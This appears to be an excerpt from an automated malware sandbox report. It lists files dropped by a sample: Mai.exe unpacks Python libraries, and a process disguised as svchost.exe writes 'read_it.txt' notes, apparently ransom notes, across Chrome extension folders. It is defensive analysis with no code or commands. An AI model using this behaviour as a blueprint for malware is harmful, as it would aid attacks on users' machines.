                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD5.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ed448.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Util\_strxor.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeFile created: C:\Users\user\Desktop\Mai.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\select.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_ghash_portable.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Util\_cpuid_c.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\unicodedata.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Protocol\_scrypt.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA384.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cast.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\libssl-3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_arc2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\ucrtbase.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\win32\win32api.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA512.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA224.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cbc.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA1.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_ctypes.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140_1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_decimal.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ecb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_des.pydJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\read_it.txtJump to behavior
